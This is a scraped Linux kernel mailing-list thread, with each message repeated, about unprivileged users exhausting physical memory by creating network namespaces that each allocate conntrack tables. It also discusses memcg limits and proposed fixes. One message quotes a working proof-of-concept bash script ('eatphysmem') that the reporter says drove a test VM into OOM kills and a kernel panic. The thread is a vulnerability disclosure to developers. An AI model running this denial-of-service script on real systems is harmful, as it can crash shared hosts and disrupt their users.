Re: userns, netns, and quick physical memory consumption by unprivileged user
On Fri 11-03-16 18:06:59, Yuriy M. Kaminskiy wrote: [...] > And also tried with memcg: > t=/sys/fs/cgroup/memory/test1;mkdir $t;echo 0 >$t/tasks; > echo 48M >$t/memory.limit_in_bytes; su testuser [...] > and it has not helped at all (rather opposite, it ended up with killed > init and kernel panic; well, later is pure (un)luck; but point is, memcg > apparently *CANNOT* curb net/ns allocations). It seems you were using memcg v1 here. This didn't have the kernel memory accounting enabled by default. With the v2 you get both user and kernel (well some subset of it) accounting enabled. Whether we account also netns related data structures sufficiently is a question. I haven't checked. But it would be worth trying and fix. -- Michal Hocko SUSE Labs
Re: userns, netns, and quick physical memory consumption by unprivileged user
On Fri 11-03-16 18:06:59, Yuriy M. Kaminskiy wrote: [...] > And also tried with memcg: > t=/sys/fs/cgroup/memory/test1;mkdir $t;echo 0 >$t/tasks; > echo 48M >$t/memory.limit_in_bytes; su testuser [...] > and it has not helped at all (rather opposite, it ended up with killed > init and kernel panic; well, later is pure (un)luck; but point is, memcg > apparently *CANNOT* curb net/ns allocations). It seems you were using memcg v1 here. This didn't have the kernel memory accounting enabled by default. With the v2 you get both user and kernel (well some subset of it) accounting enabled. Whether we account also netns related data structures sufficiently is a question. I haven't checked. But it would be worth trying and fix. -- Michal Hocko SUSE Labs
Re: userns, netns, and quick physical memory consumption by unprivileged user
On Fri, Mar 11, 2016 at 04:34:06PM +0100, Florian Westphal wrote: > Yuriy M. Kaminskiywrote: > > BTW, all those hash/conntrack/etc default sizes was calculated from > > physical memory size in assumption there will be only *one* instance of > > those tables. Obviously, introduction of network namespaces (and > > especially unprivileged user-ns) thrown this assumption in the window > > (and here comes that "falling back to vmalloc" message again; in pre-netns > > world, those tables were allocated *once* on early system startup, with > > typically plenty of free and unfragmented memory). > > No idea how to fix this expect by removing conntrack support in net > namespaces completely. > > I'd disallow all write accesses to skb->nfct (NAT, CONNMARK, > CONNSECMARK, ...) and then no longer clear skb->nfct when forwarding > packet from init_ns to container. > > Containers could then still test conntrack as seen from init namespace pov > in PREROUTING/FORWARD/INPUT (but not OUTPUT, obviously). > > [ OUTPUT *might* be doable as well by allowing NEW creation in output > but skipping nat and deferring the confirmation/commit of the new > entry to the table until skb leaves initns ] > > We could key conntrack entries to initns conntrack table > instead of adding one new table per netns, but seems like this only > replaces one problem with a new one (filling/blocking initns table from > another netns). We can add a global perns limit in terms of conntrack entries that can only be set via CAP_NET_ADMIN from the initns. Thus, we avoid the filling/blocking from another netns, or hide this knob to unpriviledged userns somehow. In the previous netfilter workshop I remember we agreed on going towards having a single conntrack table for netns, so I suggest we follow that direction.
Re: userns, netns, and quick physical memory consumption by unprivileged user
On Fri, Mar 11, 2016 at 04:34:06PM +0100, Florian Westphal wrote: > Yuriy M. Kaminskiy wrote: > > BTW, all those hash/conntrack/etc default sizes was calculated from > > physical memory size in assumption there will be only *one* instance of > > those tables. Obviously, introduction of network namespaces (and > > especially unprivileged user-ns) thrown this assumption in the window > > (and here comes that "falling back to vmalloc" message again; in pre-netns > > world, those tables were allocated *once* on early system startup, with > > typically plenty of free and unfragmented memory). > > No idea how to fix this expect by removing conntrack support in net > namespaces completely. > > I'd disallow all write accesses to skb->nfct (NAT, CONNMARK, > CONNSECMARK, ...) and then no longer clear skb->nfct when forwarding > packet from init_ns to container. > > Containers could then still test conntrack as seen from init namespace pov > in PREROUTING/FORWARD/INPUT (but not OUTPUT, obviously). > > [ OUTPUT *might* be doable as well by allowing NEW creation in output > but skipping nat and deferring the confirmation/commit of the new > entry to the table until skb leaves initns ] > > We could key conntrack entries to initns conntrack table > instead of adding one new table per netns, but seems like this only > replaces one problem with a new one (filling/blocking initns table from > another netns). We can add a global perns limit in terms of conntrack entries that can only be set via CAP_NET_ADMIN from the initns. Thus, we avoid the filling/blocking from another netns, or hide this knob to unpriviledged userns somehow. In the previous netfilter workshop I remember we agreed on going towards having a single conntrack table for netns, so I suggest we follow that direction.
Re: userns, netns, and quick physical memory consumption by unprivileged user
ping (+ more test results at bottom) On Wed, 02 Mar 2016, I wrote: > While looking at CVE-2016-2847, I remembered about infamous > nf_conntrack: falling back to vmalloc > message, that was often triggered by network namespace creation (message > was removed recently, but it changed nothing with underlying problem). > > So, how about something like this: > > $ cat << EOF >> eatphysmem > #!/bin/bash -xe > fd=6 > d="`mktemp -d /tmp/eatmemX`" > cd "$d" > rule="iptables -A INPUT -m conntrack --ctstate ESTABLISHED -j ACCEPT" > # rule="$rule;$rule" > # ... just because we can; same with any number of ip li/ro/ru/etc > while :; do > let fd=fd+1 > [ ! -e /proc/$$/fd/$fd ] || continue > mkfifo f1 f2 > unshare -rn sh -xec "echo foo >f1;ip li se lo up; $rule;read rpid=$! > read r eval "exec $fd echo bar >f2 > wait > rm f2 f1 > free > sleep 0.1s > done > sleep inf > EOF > $ chmod a+x eatphysmem; unshare -rpf --mount-proc ./eatphysmem > ? > > You can easily eat 0.5M physical memory per netns (conntrack hash table > (hashsize*sizeof(list_head))) and more, and pin them to single process > with opened netns fds. > What can stop it? > ulimit? What is ulimit? Conntrack knows nothing about them. > Ah-yeah, `ulimit -n`? 64k. 64k*512k = 32G. Per process. Oh-uh. > OOM killer? But this is not this process memory; if any, it will be > killed last. > (I wonder, if memcg can tackle it; probably yes; but how many people > have it configured?). I tested in vm with kernel 4.4.2 (from user account, with ulimit -v 32768); as expected, it quickly eaten all memory, OOM killer went berserk and killed even systemd-journald and systemd-udevd, but left this process living (and hogging all physical memory; also note that swap was enabled - and mostly remained unused). And also tried with memcg: t=/sys/fs/cgroup/memory/test1;mkdir $t;echo 0 >$t/tasks; echo 48M >$t/memory.limit_in_bytes; su testuser [...] and it has not helped at all (rather opposite, it ended up with killed init and kernel panic; well, later is pure (un)luck; but point is, memcg apparently *CANNOT* curb net/ns allocations). BTW, all those hash/conntrack/etc default sizes was calculated from physical memory size in assumption there will be only *one* instance of those tables. Obviously, introduction of network namespaces (and especially unprivileged user-ns) thrown this assumption in the window (and here comes that "falling back to vmalloc" message again; in pre-netns world, those tables were allocated *once* on early system startup, with typically plenty of free and unfragmented memory).
Re: userns, netns, and quick physical memory consumption by unprivileged user
ping (+ more test results at bottom) On Wed, 02 Mar 2016, I wrote: > While looking at CVE-2016-2847, I remembered about infamous > nf_conntrack: falling back to vmalloc > message, that was often triggered by network namespace creation (message > was removed recently, but it changed nothing with underlying problem). > > So, how about something like this: > > $ cat << EOF >> eatphysmem > #!/bin/bash -xe > fd=6 > d="`mktemp -d /tmp/eatmemX`" > cd "$d" > rule="iptables -A INPUT -m conntrack --ctstate ESTABLISHED -j ACCEPT" > # rule="$rule;$rule" > # ... just because we can; same with any number of ip li/ro/ru/etc > while :; do > let fd=fd+1 > [ ! -e /proc/$$/fd/$fd ] || continue > mkfifo f1 f2 > unshare -rn sh -xec "echo foo >f1;ip li se lo up; $rule;read r pid=$! > read r eval "exec $fd echo bar >f2 > wait > rm f2 f1 > free > sleep 0.1s > done > sleep inf > EOF > $ chmod a+x eatphysmem; unshare -rpf --mount-proc ./eatphysmem > ? > > You can easily eat 0.5M physical memory per netns (conntrack hash table > (hashsize*sizeof(list_head))) and more, and pin them to single process > with opened netns fds. > What can stop it? > ulimit? What is ulimit? Conntrack knows nothing about them. > Ah-yeah, `ulimit -n`? 64k. 64k*512k = 32G. Per process. Oh-uh. > OOM killer? But this is not this process memory; if any, it will be > killed last. > (I wonder, if memcg can tackle it; probably yes; but how many people > have it configured?). I tested in vm with kernel 4.4.2 (from user account, with ulimit -v 32768); as expected, it quickly eaten all memory, OOM killer went berserk and killed even systemd-journald and systemd-udevd, but left this process living (and hogging all physical memory; also note that swap was enabled - and mostly remained unused). And also tried with memcg: t=/sys/fs/cgroup/memory/test1;mkdir $t;echo 0 >$t/tasks; echo 48M >$t/memory.limit_in_bytes; su testuser [...] and it has not helped at all (rather opposite, it ended up with killed init and kernel panic; well, later is pure (un)luck; but point is, memcg apparently *CANNOT* curb net/ns allocations). BTW, all those hash/conntrack/etc default sizes was calculated from physical memory size in assumption there will be only *one* instance of those tables. Obviously, introduction of network namespaces (and especially unprivileged user-ns) thrown this assumption in the window (and here comes that "falling back to vmalloc" message again; in pre-netns world, those tables were allocated *once* on early system startup, with typically plenty of free and unfragmented memory).
Re: userns, netns, and quick physical memory consumption by unprivileged user
Yuriy M. Kaminskiywrote: > BTW, all those hash/conntrack/etc default sizes was calculated from > physical memory size in assumption there will be only *one* instance of > those tables. Obviously, introduction of network namespaces (and > especially unprivileged user-ns) thrown this assumption in the window > (and here comes that "falling back to vmalloc" message again; in pre-netns > world, those tables were allocated *once* on early system startup, with > typically plenty of free and unfragmented memory). No idea how to fix this expect by removing conntrack support in net namespaces completely. I'd disallow all write accesses to skb->nfct (NAT, CONNMARK, CONNSECMARK, ...) and then no longer clear skb->nfct when forwarding packet from init_ns to container. Containers could then still test conntrack as seen from init namespace pov in PREROUTING/FORWARD/INPUT (but not OUTPUT, obviously). [ OUTPUT *might* be doable as well by allowing NEW creation in output but skipping nat and deferring the confirmation/commit of the new entry to the table until skb leaves initns ] We could key conntrack entries to initns conntrack table instead of adding one new table per netns, but seems like this only replaces one problem with a new one (filling/blocking initns table from another netns). Maybe we could go with a compromise and skip/disallow conntrack in unpriv userns only?
Re: userns, netns, and quick physical memory consumption by unprivileged user
Yuriy M. Kaminskiy wrote: > BTW, all those hash/conntrack/etc default sizes was calculated from > physical memory size in assumption there will be only *one* instance of > those tables. Obviously, introduction of network namespaces (and > especially unprivileged user-ns) thrown this assumption in the window > (and here comes that "falling back to vmalloc" message again; in pre-netns > world, those tables were allocated *once* on early system startup, with > typically plenty of free and unfragmented memory). No idea how to fix this expect by removing conntrack support in net namespaces completely. I'd disallow all write accesses to skb->nfct (NAT, CONNMARK, CONNSECMARK, ...) and then no longer clear skb->nfct when forwarding packet from init_ns to container. Containers could then still test conntrack as seen from init namespace pov in PREROUTING/FORWARD/INPUT (but not OUTPUT, obviously). [ OUTPUT *might* be doable as well by allowing NEW creation in output but skipping nat and deferring the confirmation/commit of the new entry to the table until skb leaves initns ] We could key conntrack entries to initns conntrack table instead of adding one new table per netns, but seems like this only replaces one problem with a new one (filling/blocking initns table from another netns). Maybe we could go with a compromise and skip/disallow conntrack in unpriv userns only?